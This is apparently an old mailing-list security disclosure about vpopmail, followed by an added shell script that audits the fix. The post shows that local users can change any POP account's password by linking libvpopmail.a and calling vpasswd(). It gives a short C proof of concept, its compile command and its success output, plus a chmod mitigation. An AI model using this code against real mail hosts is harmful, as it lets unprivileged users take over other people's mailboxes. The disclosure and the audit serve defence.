[ Apologies if this has been previously covered ]

Maybe I'm a bit paranoid..
I know most people don't run shell/mail services on the same machine,
but if you did, it is possible for non-admin accounts to change the password
of pop accounts.

The simple fix is to chmod 0700 ~vpopmail/lib, which will prevent linking
with the libvpopmail.a library.

--vpop_sec_test.c--
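#include <stdio.h>
#include <sys/time.h>
#include <vpopmail.h>
#include <vauth.h>

/* Routine from libvpopmail.a that changes a pop account's password. */
extern int vpasswd( char *, char *, char *, int);

int main(void) {

  /* The last parameter is declared int, so pass 0 rather than NULL. */
  if ( (vpasswd("user", "domain.net", "mynewpasswd", 0) ) == 0 ){
    printf("changed passwd\n");
  }
  return 0;
}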
--vpop_sec_test.c--

$ gcc -o test vpop_sec_test.o /home/vpopmail/lib/libvpopmail.a -L/usr/local/mysql/lib \
    -lmysqlclient -lsocket -lnsl -lm

$./test
changed passwd
$


-- 

--
-------------------------
Sean P. Scanlon
[EMAIL PROTECTED]
-------------------------

"Personally, I think hashes are gods greatest gift to the programmer. I
love them. If I could turn my wife into one, I would. "
                                -seen in 'comp.lang.perl.misc'
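
An added example, not part of the original post: a shell audit that checks whether the fix above (chmod 0700 on the vpopmail lib directory) is in place and, if it is not, lists the static libraries that accounts other than the owner can reach. The function names are hypothetical; pass the directory to check as the first argument (the post's gcc line uses /home/vpopmail/lib).

```shell
#!/bin/sh
# Added example: audit the "chmod 0700 ~vpopmail/lib" mitigation.
# Function names are hypothetical; the directory is passed as $1.

# Print the group+other permission characters of a path,
# e.g. "r-xr-x" for mode 0755 or "------" for mode 0700.
group_other_bits() {
    ls -ld "$1" | cut -c5-10
}

# Succeed only when neither group nor other has any access to the path.
is_private() {
    [ "$(group_other_bits "$1")" = "------" ]
}

# Audit a library directory.
# Returns 0 = owner-only, 1 = exposed, 2 = directory missing.
audit_lib_dir() {
    dir=$1
    if [ ! -d "$dir" ]; then
        echo "MISSING  $dir"
        return 2
    fi
    if is_private "$dir"; then
        echo "OK       $dir is owner-only"
        return 0
    fi
    echo "EXPOSED  $dir ($(ls -ld "$dir" | cut -c1-10))"
    # With the directory open, any archive that is itself readable
    # beyond its owner can be named on another account's link line.
    for lib in "$dir"/*.a; do
        [ -f "$lib" ] || continue
        is_private "$lib" || echo "  reachable beyond owner: $lib"
    done
    return 1
}

# Run the audit only when a directory is given on the command line.
[ $# -eq 0 ] || audit_lib_dir "$1"
```

A non-zero exit status makes the script usable from cron or a configuration-management check, so a package upgrade that resets the directory mode is noticed.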
